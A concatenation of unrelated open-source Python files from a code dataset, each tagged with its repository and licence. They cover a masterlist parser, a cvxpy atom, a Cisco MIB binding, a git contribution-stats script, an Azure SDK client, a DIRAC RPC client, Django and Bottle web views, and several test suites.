thisGroup.AddChild(thisBlock)
# ブロックに行を追加
thisBlock.AddChild(thisLine)
if thisLine.IsType(EnumLineType.ENDGROUP):
# グループを親に戻し、ブロックを作成して紐付ける
if thisGroup.Parent() is None:
raise SyntaxError, "The group does not match the beginning and end."
thisGroup = thisGroup.Parent()
# ここで作ったブロックは、結局、使われなくなるケースが
# 発生するが、これは後で消すことにする。
thisBlock = Block()
thisGroup.AddChild(thisBlock)
if countbegingroup != countendgroup:
raise SyntaxError, "The group does not match the beginning and end."
finally:
# マスタリストを閉じる
filemasterlist.close()
# 行データのない不要なゴミブロックを削除する。
for waste in self._getWasteBlock():
waste.Parent().DeleteChild(waste)
return self
def DebugSave(self, fullpath):
"""
指定したファイルへデバッグ情報を出力します。
デバッグ出力には\ :meth:`LinkedTreeObject.LinkedTreeObject.DebugOutput`\ を使用します。
:param string fullpath: 保存するファイル名
"""
if os.path.exists(fullpath):
os.remove(fullpath)
filedebug = codecs.open(fullpath, "wU", "utf-8-sig")
try:
filedebug.write(self.DebugOutput())
finally:
filedebug.close()
return self
def DebugSimpleSave(self, fullpath):
"""
指定したファイルへシンプルなデバッグ情報を出力します。
デバッグ出力には\ :meth:`LinkedTreeObject.LinkedTreeObject.DebugSimpleOutput`\ を使用します。
:param string fullpath: 保存するファイル名
"""
if os.path.exists(fullpath):
os.remove(fullpath)
filedebug = codecs.open(fullpath, "wU", "utf-8-sig")
try:
filedebug.write(self.DebugSimpleOutput())
finally:
filedebug.close()
return self
if __name__ == "__main__":
print u"%s Version: %s %s" % (__appname__, __version__, __copyright__)
print u"%s" % (__license__)
| jakenjarvis/pyOss | pyOssLib/v1_0/MasterlistLib.py | Python | gpl-3.0 | 89,690 |
"""
Copyright 2013 Steven Diamond
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cvxpy.atoms.quad_over_lin import quad_over_lin
def sum_squares(expr):
"""The sum of the squares of the entries.
Parameters
----------
expr: Expression
The expression to take the sum of squares of.
Returns
-------
Expression
An expression representing the sum of squares.
"""
return quad_over_lin(expr, 1)
| SteveDiamond/cvxpy | cvxpy/atoms/sum_squares.py | Python | gpl-3.0 | 930 |
../../../../../share/pyshared/twisted/python/urlpath.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/twisted/python/urlpath.py | Python | gpl-3.0 | 55 |
""" CISCO_IETF_MPLS_ID_STD_03_MIB
Copyright (c) 2012 IETF Trust and the persons identified
as the document authors. All rights reserved.
This MIB module contains generic object definitions for
MPLS Traffic Engineering in transport networks. This module is a
cisco\-ized version of the IETF draft\:
draft\-ietf\-mpls\-tp\-te\-mib\-03.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class CiscoIetfMplsIdStd03Mib(object):
"""
.. attribute:: cmplsidobjects
**type**\: :py:class:`Cmplsidobjects <ydk.models.cisco_ios_xe.CISCO_IETF_MPLS_ID_STD_03_MIB.CiscoIetfMplsIdStd03Mib.Cmplsidobjects>`
"""
_prefix = 'CISCO-IETF-MPLS-ID-STD-03-MIB'
_revision = '2012-06-07'
def __init__(self):
self.cmplsidobjects = CiscoIetfMplsIdStd03Mib.Cmplsidobjects()
self.cmplsidobjects.parent = self
class Cmplsidobjects(object):
"""
.. attribute:: cmplsglobalid
This object allows the administrator to assign a unique operator identifier also called MPLS\-TP Global\_ID
**type**\: str
**length:** 4
.. attribute:: cmplsicc
This object allows the operator or service provider to assign a unique MPLS\-TP ITU\-T Carrier Code (ICC) to a network
**type**\: str
**length:** 1..6
.. attribute:: cmplsnodeid
This object allows the operator or service provider to assign a unique MPLS\-TP Node\_ID. The Node\_ID is assigned within the scope of the Global\_ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'CISCO-IETF-MPLS-ID-STD-03-MIB'
_revision = '2012-06-07'
def __init__(self):
self.parent = None
self.cmplsglobalid = None
self.cmplsicc = None
self.cmplsnodeid = None
@property
def _common_path(self):
return '/CISCO-IETF-MPLS-ID-STD-03-MIB:CISCO-IETF-MPLS-ID-STD-03-MIB/CISCO-IETF-MPLS-ID-STD-03-MIB:cmplsIdObjects'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.cmplsglobalid is not None:
return True
if self.cmplsicc is not None:
return True
if self.cmplsnodeid is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xe._meta import _CISCO_IETF_MPLS_ID_STD_03_MIB as meta
return meta._meta_table['CiscoIetfMplsIdStd03Mib.Cmplsidobjects']['meta_info']
@property
def _common_path(self):
return '/CISCO-IETF-MPLS-ID-STD-03-MIB:CISCO-IETF-MPLS-ID-STD-03-MIB'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.cmplsidobjects is not None and self.cmplsidobjects._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xe._meta import _CISCO_IETF_MPLS_ID_STD_03_MIB as meta
return meta._meta_table['CiscoIetfMplsIdStd03Mib']['meta_info']
| 111pontes/ydk-py | cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IETF_MPLS_ID_STD_03_MIB.py | Python | apache-2.0 | 3,540 |
import os
import re
import json
import pprint
EMPTY = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'
repo = str(input('Enter clone url to git repo: '))
repo_folder = repo.split('/')[-1].split('.git')[0]
os.system('git clone ' + repo)
os.system('cd ' + repo_folder)
log = os.popen('git --git-dir ./' + repo_folder + '/.git log').read().split('\n')
# log = os.popen('git log').read().split('\n')
log = list(filter(lambda x: re.match('commit [0-9a-f]{5,40}',x) != None or x[:6] == 'Author', log))
log = list(map(lambda x: x.split(' ')[1].lower() if x[:6] == 'Author' else x.split(' ')[1], log))
log = list(zip(log[1:len(log):2], log[0:len(log):2]))
activity = dict(map(lambda x: (x[0], {}), log))
for i in range(len(log)):
if i < len(log)-1:
out = os.popen('git --git-dir ./' + repo_folder + '/.git diff '+log[i][1]+' '+log[i+1][1]+' --numstat').read().split('\n')
# out = os.popen('git diff '+log[i][1]+' '+log[i+1][1]+' --numstat').read().split('\n')
else:
out = os.popen('git --git-dir ./' + repo_folder + '/.git diff '+log[i][1]+' '+EMPTY+' --numstat').read().split('\n')
# out = os.popen('git diff '+log[i][1]+' '+EMPTY+' --numstat').read().split('\n')
user = log[i][0]
for o in out[:-1]:
ol = o.split('\t')
changes = 1
if ol[0] != '-' and ol[1] != '-':
changes = int(ol[0])+int(ol[1])
k = '/'+repo_folder+'/'+ol[2]
if k in activity[user]:
activity[user][k] += changes
else:
activity[user][k] = changes
# print(activity)
# for l in log: print(l)
rootDir = './'+repo_folder
fileList = []
cmd = """ls -R """+rootDir+""" | awk '/:$/&&f{s=$0;f=0}/:$/&&!f{sub(/:$/,"");s=$0;f=1;next}NF&&f{ print s"/"$0 }'"""
fileList = os.popen(cmd).read().split('\n')
fileList = list(map(lambda x: x[1:], fileList))
fileList = sorted(fileList, key=lambda x: x.count('/'))[1:]
# for f in fileList: print(f)
class Node:
def __init__(self, path):
self.path = path
self.contributions = {}
self.files = []
def getNode(node, path):
if node.path == path: return node
parent = None
for c in node.files:
parent = getNode(c, path)
if parent != None: break
return parent
def addNode(node, childPath, parentPath):
child = Node(childPath)
parent = getNode(node, parentPath)
parent.files.append(child)
def populateTree(root, data):
for d in data:
idx = d.rfind('/')
parent = '/'
if (idx > 0): parent = d[:idx]
addNode(root, d, parent)
def combineDicts(d1, d2):
result = {}
for k in d1: result[k] = d1[k]
for k in d2:
if k in result:
result[k] += d2[k]
else:
result[k] = d2[k]
return result
def extractActivity(path):
result = {}
for user in activity:
if path in activity[user]:
result[user] = activity[user][path]
return result
def getContributions(node):
if len(node.files) == 0:
node.contributions = extractActivity(node.path)
return node.contributions
for c in node.files:
node.contributions = combineDicts(node.contributions, getContributions(c))
return node.contributions
root = Node('/'+repo_folder)
populateTree(root, fileList)
getContributions(root)
json = json.dumps(root, default=lambda o: o.__dict__, sort_keys=False, indent=4, separators=(',', ': '))
os.system('rm -rf ' + repo_folder)
# print(json)
output = open('data.json','w')
output.write(json)
output.close() | vivekmumbles/git-ledger | data.py | Python | gpl-2.0 | 3,254 |
# -*- coding: utf-8 -*-
from Model import Model
import sys, locale;
# ucitava primjere iz zadane datoteke
def load_data_X(file):
X = []
for line in open(file):
line = line.decode('utf-8')
sentences = line.strip().split('\t')
X.append(sentences)
return X
# ucitava izlaze primjera iz zadane datoteke
def load_data_y(file):
y = []
for line in open(file):
y.append(float(line))
return y
# ogranicava vrijednost x izmedju minx i maxx
def clamp(x, minx, maxx):
return max(min(maxx, x), minx)
# ispisuje izlaz modela u datoteku file (rezultati se ogranicavaju na [0, 5])
def write_output(file, output):
f = open(file, 'w')
for x in output:
r = clamp(x, 0, 5)
f.write(str(r) + '\n')
# ispisuje n najgore ocjenjenih primjera u datoteku file (rezultati se ogranicavaju na [0, 5])
def write_low_scored(file, X, y, output, n):
if (n >= len(output)):
n = len(output) - 1
diffs = [abs(clamp(output[i], 0, 5) - y[i]) for i in xrange(0, len(output))]
diff_threshold = sorted(diffs, reverse=True)[n]
f = open(file, 'w')
for i in xrange(0, len(output)):
r = clamp(output[i], 0, 5)
diff = abs(r - y[i])
if diff >= diff_threshold:
f.write(X[i][0].encode('utf-8') + '\n')
f.write(X[i][1].encode('utf-8') + '\n')
f.write('Tocno: ' + str(y[i]) + '\n')
f.write('Dobiveno: ' + str(r) + '\n')
f.write('Razlika: ' + str(diff) + '\n')
# testiranje za 1 primjer
# moze se zadati model ako je vec naucen
def test(X_train_files, y_train_files, X_test_files, y_test_files, train_out_file, test_out_file,
train_bad_out_file=None, test_bad_out_file=None,
model=None, C_set=None, gamma_set=None, epsilon_set=None, k=None):
X_train = []
y_train = []
X_test = []
y_test = []
for file in X_train_files:
X_train.extend(load_data_X(file))
for file in y_train_files:
y_train.extend(load_data_y(file))
for file in X_test_files:
X_test.extend(load_data_X(file))
for file in y_test_files:
y_test.extend(load_data_y(file))
if model is None:
if C_set is None:
C_set = [2 ** x for x in range(-5, 15 + 1)]
if gamma_set is None:
gamma_set = [2 ** x for x in range(-15, 3 + 1)]
if epsilon_set is None:
epsilon_set = [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.02, 0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.4, 0.5, 0.6,
0.7, 0.8, 0.9, 1, 2]
if k is None:
k = 10
model = Model()
model.train_k_fold(X_train, y_train, C_set, gamma_set, epsilon_set, k)
print 'C:', model.get_param_C()
print 'epsilon:', model.get_param_epsilon()
print 'gamma:', model.get_param_gamma()
if train_out_file != '':
# print "Tocni (train): ", y_train
predicted_train = model.predict(X_train)
# print "Dobiveni (train): ", predicted_train
write_output(train_out_file, predicted_train)
if (train_bad_out_file is not None):
write_low_scored(train_bad_out_file, X_train, y_train, predicted_train, 50)
if test_out_file != '':
# print "Tocni (test): ", y_test
predicted_test = model.predict(X_test)
# print "Dobiveni (test): ", predicted_test
write_output(test_out_file, predicted_test)
if (test_bad_out_file is not None):
write_low_scored(test_bad_out_file, X_test, y_test, predicted_test, 50)
return model
# funkcija za interaktivni demo
def interactive_demo(X_train_files, y_train_files, C, gamma, epsilon):
print 'Zapocinje ucenje modela'
X_train = []
y_train = []
for file in X_train_files:
X_train.extend(load_data_X(file))
for file in y_train_files:
y_train.extend(load_data_y(file))
model = Model()
model.train(X_train, y_train, True, C, gamma, epsilon)
print 'Ucenje modela je zavrseno'
while True:
print 'Unesite 1. recenicu:'
x1 = raw_input().decode(sys.stdin.encoding or locale.getpreferredencoding(True))
print 'Unesite 2. recenicu:'
x2 = raw_input().decode(sys.stdin.encoding or locale.getpreferredencoding(True))
x = [x1, x2]
y = model.predict(x)[0]
print clamp(y, 0, 5)
# pokreni ucenje i evaluaciju
k = 5
if len(sys.argv) >= 2:
k = int(sys.argv[1])
print "Trazena akcija k =", k
if k == 1:
# MSRpar
print 'MSRpar'
test(['../data/train/STS.input.MSRpar.txt'], ['../data/train/STS.gs.MSRpar.txt'],
['../data/test-gold/STS.input.MSRpar.txt'], ['../data/test-gold/STS.gs.MSRpar.txt'],
'MSRpar_train.out', 'MSRpar_test.out', 'MSRpar_train_bad.txt', 'MSRpar_test_bad.txt')
elif k == 2:
# MSRvid
print 'MSRvid'
test(['../data/train/STS.input.MSRvid.txt'], ['../data/train/STS.gs.MSRvid.txt'],
['../data/test-gold/STS.input.MSRvid.txt'], ['../data/test-gold/STS.gs.MSRvid.txt'],
'MSRvid_train.out', 'MSRvid_test.out', 'MSRvid_train_bad.txt', 'MSRvid_test_bad.txt')
elif k == 3:
# SMTeuroparl i SMTnews
print 'SMTeuroparl'
model = test(['../data/train/STS.input.SMTeuroparl.txt'], ['../data/train/STS.gs.SMTeuroparl.txt'],
['../data/test-gold/STS.input.SMTeuroparl.txt'], ['../data/test-gold/STS.gs.SMTeuroparl.txt'],
'SMTeuroparl_train.out', 'SMTeuroparl_test.out', 'SMTeuroparl_train_bad.txt', 'SMTeuroparl_test_bad.txt')
print 'SMTnews'
test([], [],
['../data/test-gold/STS.input.surprise.SMTnews.txt'], ['../data/test-gold/STS.gs.surprise.SMTnews.txt'],
'', 'SMTnews_test.out', '', 'SMTnews_test_bad.txt', model)
elif k == 4:
# OnWn i All
print 'OnWn'
model = test(['../data/train/STS.input.MSRpar.txt', '../data/train/STS.input.MSRvid.txt',
'../data/train/STS.input.SMTeuroparl.txt'],
['../data/train/STS.gs.MSRpar.txt', '../data/train/STS.gs.MSRvid.txt',
'../data/train/STS.gs.SMTeuroparl.txt'],
['../data/test-gold/STS.input.surprise.OnWN.txt'],
['../data/test-gold/STS.gs.surprise.OnWN.txt'],
'OnWn_train.out', 'OnWn_test.out', 'OnWn_train_bad.txt', 'OnWn_test_bad.txt',
None, [2 ** x for x in range(-3, 11 + 1)], [2 ** x for x in range(-15, 3 + 1)],
[0.0001, 0.0005, 0.001, 0.005, 0.01, 0.02, 0.05, 0.1, 0.15, 0.2, 0.25, 0.5, 0.75, 1, 2], 3)
print 'All'
test([], [],
['../data/test-gold/STS.input.MSRpar.txt', '../data/test-gold/STS.input.MSRvid.txt',
'../data/test-gold/STS.input.SMTeuroparl.txt', '../data/test-gold/STS.input.surprise.SMTnews.txt',
'../data/test-gold/STS.input.surprise.OnWN.txt'],
['../data/test-gold/STS.gs.MSRpar.txt', '../data/test-gold/STS.gs.MSRvid.txt',
'../data/test-gold/STS.gs.SMTeuroparl.txt', '../data/test-gold/STS.gs.surprise.SMTnews.txt',
'../data/test-gold/STS.gs.surprise.OnWN.txt'],
'', 'All_test.out', '', 'All_test_bad.txt', model)
elif k == 5:
print 'Interaktivni demo'
interactive_demo(['../data/train/STS.input.MSRpar.txt', '../data/train/STS.input.MSRvid.txt',
'../data/train/STS.input.SMTeuroparl.txt'],
['../data/train/STS.gs.MSRpar.txt', '../data/train/STS.gs.MSRvid.txt',
'../data/train/STS.gs.SMTeuroparl.txt'], 2, 2, 0.25) | kbiscanic/apt_project | apt/Main.py | Python | apache-2.0 | 7,473 |
import argparse
import subprocess
import os.path as osp
cdir = osp.dirname(__file__)
wheeldir_dpath = osp.join(cdir, 'wheelhouse')
pip_args = ['wheel', '--wheel-dir', wheeldir_dpath, '--use-wheel', '--find-links',
wheeldir_dpath]
def build_file(req_fpath):
subprocess.check_call(['pip'] + pip_args + ['-r', req_fpath])
subprocess.check_call(['pip3.4'] + pip_args + ['-r', req_fpath])
def build_packages(packages):
subprocess.check_call(['pip'] + pip_args + packages)
subprocess.check_call(['pip3.4'] + pip_args + packages)
parser = argparse.ArgumentParser()
parser.add_argument('packages', nargs='*', default=[])
if __name__ == '__main__':
args = parser.parse_args()
if not args.packages:
build_file(osp.join(cdir, 'runtime.txt'))
build_file(osp.join(cdir, 'testing.txt'))
else:
build_packages(args.packages)
| nZac/keg-elements | requirements/build-wheelhouse.py | Python | bsd-3-clause | 881 |
"""
This is the test suite for segregation.py.
"""
from unittest import TestCase
from propargs.propargs import PropArgs
import models.segregation as seg
from indra.composite import Composite
from indra.env import Env
from registry.registry import get_env
from models.segregation import DEF_TOLERANCE, DEF_SIGMA
from models.segregation import env_favorable, BLUE_AGENTS, RED_AGENTS
from models.segregation import group_names, my_group_index
from models.segregation import other_group_index, get_tolerance
from models.segregation import set_up, create_resident, RED_TEAM, BLUE_TEAM
TEST_ANUM = 999999
REP_RAND_TESTS = 100
SMALL_GRID = 4
def print_sep():
print("________________________", flush=True)
class SegregationTestCase(TestCase):
def setUp(self):
set_up()
def tearDown(self):
pass
# an integration test:
def test_main(self):
self.assertEqual(seg.main(), 0)
def test_get_tolerance(self):
"""
Test that our tolerance function gets a good distribution.
"""
sum_of_tolerance = 0
for i in range(REP_RAND_TESTS):
sum_of_tolerance += get_tolerance(DEF_TOLERANCE, DEF_SIGMA)
avg = sum_of_tolerance / REP_RAND_TESTS
self.assertLess(DEF_TOLERANCE - .2, avg)
self.assertGreater(DEF_TOLERANCE + .2, avg)
def test_my_group_index(self):
red_agent = create_resident(RED_AGENTS, TEST_ANUM)
self.assertEqual(RED_TEAM, my_group_index(red_agent))
blue_agent = create_resident(BLUE_AGENTS, TEST_ANUM)
self.assertEqual(BLUE_TEAM, my_group_index(blue_agent))
def test_other_group_index(self):
red_agent = create_resident(RED_AGENTS, TEST_ANUM)
self.assertEqual(BLUE_TEAM, other_group_index(red_agent))
blue_agent = create_resident(BLUE_AGENTS, TEST_ANUM)
self.assertEqual(RED_TEAM, other_group_index(blue_agent))
def test_create_agent(self):
"""
Test that creating an agent works.
"""
fred = create_resident(RED_AGENTS, TEST_ANUM)
freds_nm = group_names[RED_TEAM] + str(TEST_ANUM)
self.assertEqual(freds_nm, str(fred))
def agent_in_little_city(self, with_blue=False):
red_agents = Composite("My reds")
test_agent = create_resident(RED_AGENTS, TEST_ANUM)
red_agents += test_agent
blue_agents = Composite("My blues")
if with_blue:
for i in range(0, SMALL_GRID * SMALL_GRID - 1):
blue_agents += create_resident(BLUE_AGENTS, TEST_ANUM + 1)
my_city = Env("Small city for test", width=SMALL_GRID,
height=SMALL_GRID,
members=[red_agents, blue_agents])
return (test_agent, my_city)
def test_seg_agent_action(self):
"""
We are going to test two cases: one where agent should
be satisfied with neighborhood, and one not.
"""
(test_agent, city) = self.agent_in_little_city()
# self.assertEqual(seg_agent_action(test_agent), True)
(test_agent, city) = self.agent_in_little_city(with_blue=True)
# the following test is mysteriously failing: must debug!
# self.assertEqual(seg_agent_action(test_agent), False)
def test_env_favorable(self):
env_fav = env_favorable(0.4, 0.5)
self.assertEqual(env_fav, False)
env_fav = env_favorable(0.6, 0.5)
self.assertEqual(env_fav, True)
| gcallah/Indra | models/tests/test_segregation.py | Python | gpl-3.0 | 3,455 |
#---------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#---------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.vnet_gateway_operations import VnetGatewayOperations
from . import models
class VnetGatewayCreationClientConfiguration(AzureConfiguration):
"""Configuration for VnetGatewayCreationClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Gets Azure subscription credentials.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify Microsoft Azure subscription. The subscription ID forms part of
the URI for every service call.
:type subscription_id: str
:param api_version: Client Api Version.
:type api_version: str
:param accept_language: Gets or sets the preferred language for the
response.
:type accept_language: str
:param long_running_operation_retry_timeout: Gets or sets the retry
timeout in seconds for Long Running Operations. Default value is 30.
:type long_running_operation_retry_timeout: int
:param generate_client_request_id: When set to true a unique
x-ms-client-request-id value is generated and included in each request.
Default is true.
:type generate_client_request_id: bool
:param str base_url: Service URL
:param str filepath: Existing config
"""
def __init__(
self, credentials, subscription_id, api_version='2015-11-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not isinstance(subscription_id, str):
raise TypeError("Parameter 'subscription_id' must be str.")
if api_version is not None and not isinstance(api_version, str):
raise TypeError("Optional parameter 'api_version' must be str.")
if accept_language is not None and not isinstance(accept_language, str):
raise TypeError("Optional parameter 'accept_language' must be str.")
if not base_url:
base_url = 'https://management.azure.com'
super(VnetGatewayCreationClientConfiguration, self).__init__(base_url, filepath)
self.add_user_agent('vnetgatewaycreationclient/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
self.api_version = api_version
self.accept_language = accept_language
self.long_running_operation_retry_timeout = long_running_operation_retry_timeout
self.generate_client_request_id = generate_client_request_id
class VnetGatewayCreationClient(object):
"""VnetGatewayCreationClient
:ivar config: Configuration for client.
:vartype config: VnetGatewayCreationClientConfiguration
:ivar vnet_gateway: VnetGateway operations
:vartype vnet_gateway: .operations.VnetGatewayOperations
:param credentials: Gets Azure subscription credentials.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify Microsoft Azure subscription. The subscription ID forms part of
the URI for every service call.
:type subscription_id: str
:param api_version: Client Api Version.
:type api_version: str
:param accept_language: Gets or sets the preferred language for the
response.
:type accept_language: str
:param long_running_operation_retry_timeout: Gets or sets the retry
timeout in seconds for Long Running Operations. Default value is 30.
:type long_running_operation_retry_timeout: int
:param generate_client_request_id: When set to true a unique
x-ms-client-request-id value is generated and included in each request.
Default is true.
:type generate_client_request_id: bool
:param str base_url: Service URL
:param str filepath: Existing config
"""
def __init__(
self, credentials, subscription_id, api_version='2015-11-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):
self.config = VnetGatewayCreationClientConfiguration(credentials, subscription_id, api_version, accept_language, long_running_operation_retry_timeout, generate_client_request_id, base_url, filepath)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.vnet_gateway = VnetGatewayOperations(
self._client, self.config, self._serialize, self._deserialize)
| BurtBiel/azure-cli | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_vnet_gateway/lib/vnet_gateway_creation_client.py | Python | mit | 5,916 |
"""
Declares model object for the VLDB
"""
from afs.model.BaseModel import BaseModel
class VLDB(BaseModel) :
"""
empty model for volume Location Database.
This defines a logical view on the DB.
The single copies of it are defined in the
DBServer model.
"""
def __init__(self):
"""
Initializes empty shell
"""
# declare db-internal attributes
BaseModel.__init__(self)
## list of servers providing this DB
self.dbservers_ipaddrs_js = "[]"
self.dbservers_ipaddrs = []
## syncsite, master-server
self.sync_server_ipaddrs = ""
## FIXME: add more attributes like registered fileservers etc.
## DB-version
self.vldb_version = -1
## list of attributes not to put into the DB
self.unmapped_attributes_list = [ 'parts', 'ExtServAttr' ]
| openafs-contrib/afspy | afs/model/VLDB.py | Python | bsd-2-clause | 883 |
""" This module hosts the logic for executing an RPC call.
"""
from DIRAC.Core.DISET.private.BaseClient import BaseClient
from DIRAC.Core.Utilities.ReturnValues import S_OK
from DIRAC.Core.Utilities.DErrno import cmpError, ENOAUTH
class InnerRPCClient(BaseClient):
"""This class instruments the BaseClient to perform RPC calls.
At every RPC call, this class:
* connects
* proposes the action
* sends the method parameters
* retrieve the result
* disconnect
"""
# Number of times we retry the call.
# The connection retry is handled by BaseClient
__retry = 0
def executeRPC(self, functionName, args):
"""Perform the RPC call, connect before and disconnect after.
:param functionName: name of the function
:param args: arguments to the function
:return: in case of success, the return of the server call. In any case
we add the connection stub to it.
"""
retVal = self._connect()
# Generate the stub which contains all the connection and call options
# JSON: cast args to list for serialization purposes
stub = [self._getBaseStub(), functionName, list(args)]
if not retVal["OK"]:
retVal["rpcStub"] = stub
return retVal
# Get the transport connection ID as well as the Transport object
trid, transport = retVal["Value"]
try:
# Handshake to perform the RPC call for functionName
retVal = self._proposeAction(transport, ("RPC", functionName))
if not retVal["OK"]:
if cmpError(retVal, ENOAUTH): # This query is unauthorized
retVal["rpcStub"] = stub
return retVal
else: # we have network problem or the service is not responding
if self.__retry < 3:
self.__retry += 1
return self.executeRPC(functionName, args)
else:
retVal["rpcStub"] = stub
return retVal
# Send the arguments to the function
# Note: we need to convert the arguments to list
# We do not need to deseralize it because variadic functions
# can work with list too
retVal = transport.sendData(S_OK(list(args)))
if not retVal["OK"]:
return retVal
# Get the result of the call and append the stub to it
# Note that the RPC timeout basically ticks here, since
# the client waits for data for as long as the server side
# processes the request.
receivedData = transport.receiveData()
if isinstance(receivedData, dict):
receivedData["rpcStub"] = stub
return receivedData
finally:
self._disconnect(trid)
| DIRACGrid/DIRAC | src/DIRAC/Core/DISET/private/InnerRPCClient.py | Python | gpl-3.0 | 2,922 |
from django.core.exceptions import PermissionDenied
from django.views.generic import TemplateView
from C4CApplication.views.utils import create_user
class ChangeActivityView(TemplateView):
template_name = "C4CApplication/ChangeActivity.html"
def dispatch(self, request, *args, **kwargs):
if 'email' not in self.request.session:
raise PermissionDenied # HTTP 403
self.user = create_user(self.request.session['email'])
return super(ChangeActivityView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ChangeActivityView, self).get_context_data(**kwargs)
context['member'] = self.user.db_member
context['connected'] = 'email' in self.request.session
return context | dsarkozi/care4care-sdp-grp4 | Care4Care/C4CApplication/views/ChangeActivityView.py | Python | agpl-3.0 | 820 |
from bottle import route, template, error, request, static_file, get, post
from index import get_index
from bmarks import get_bmarks
from tags import get_tags
from add import add_tags
from bmarklet import get_bmarklet
from account import get_account
from edit_tags import get_edit_tags
from importbm import get_import_bm
from edit import do_edit
from login import do_login
from register import do_register
@route('/')
def myroot():
return_data = get_index()
return return_data
@route('/account', method=['GET', 'POST'])
def bmarks():
return_data = get_bmarklet()
return return_data
@route('/add', method=['GET', 'POST'])
def bmarks():
return_data = add_tags()
return return_data
@route('/bmarklet')
def bmarks():
return_data = get_bmarklet()
return return_data
@route('/bmarks')
def bmarks():
return_data = get_bmarks()
return return_data
@route('/edit', method=['GET', 'POST'])
def bmarks():
return_data = do_edit()
return return_data
@route('/edit_tags', method=['GET', 'POST'])
def bmarks():
return_data = get_edit_tags()
return return_data
@route('/import', method=['GET', 'POST'])
def bmarks():
return_data = get_import_bm()
return return_data
@route('/login', method=['GET', 'POST'])
def bmarks():
return_data = do_login()
return return_data
@route('/register', method=['GET', 'POST'])
def bmarks():
return_data = do_register()
return return_data
@route('/tags')
def bmarks():
return_data = get_tags()
return return_data
# serve css
@get('/<filename:re:.*\.css>')
def send_css(filename):
return static_file(filename, root='css')
# serve javascript
@get('/<filename:re:.*\.js>')
def send_js(filename):
return static_file(filename, root='js')
# serve images
@get('<filename:re:.*\.png>')
def send_img(filename):
return static_file(filename, root='images')
# serve fonts
@get('<filename:re:.*\.(woff|woff2)>')
def send_font(filename):
return static_file(filename, root='fonts')
@error(404)
def handle404(error):
return '<H1>Ooops, its not here<BR>'
@error(500)
def handle500(error):
return '<H1>Oops, its broken: {}<BR>'.format(error)
| netllama/tastipy | tastiapp.py | Python | gpl-3.0 | 2,172 |
import json
from nose.tools import eq_
import mock
from django.core.urlresolvers import reverse
from airmozilla.base.tests.test_mozillians import (
Response,
GROUPS1,
GROUPS2
)
from .base import ManageTestCase
class TestCuratedGroups(ManageTestCase):
@mock.patch('logging.error')
@mock.patch('requests.get')
def test_curated_groups_autocomplete(self, rget, rlogging):
def mocked_get(url, **options):
if '/v2/groups/' in url and 'page=2' in url:
return Response(GROUPS2)
if '/v2/groups/' in url:
return Response(GROUPS1)
raise NotImplementedError(url)
rget.side_effect = mocked_get
url = reverse('manage:curated_groups_autocomplete')
response = self.client.get(url)
eq_(response.status_code, 200)
structure = json.loads(response.content)
eq_(structure['groups'], [])
response = self.client.get(url, {'q': 'GROUP NUMBER X'})
eq_(response.status_code, 200)
structure = json.loads(response.content)
eq_(structure['groups'], [])
response = self.client.get(url, {'q': 'GROUP NUMBER 1'})
eq_(response.status_code, 200)
structure = json.loads(response.content)
eq_(
structure['groups'], [
[
'GROUP NUMBER 1',
'GROUP NUMBER 1 (3 members)'
]
]
)
| kenrick95/airmozilla | airmozilla/manage/tests/views/test_curatedgroups.py | Python | bsd-3-clause | 1,463 |
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=import-error
import click
import jsonrpc
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol
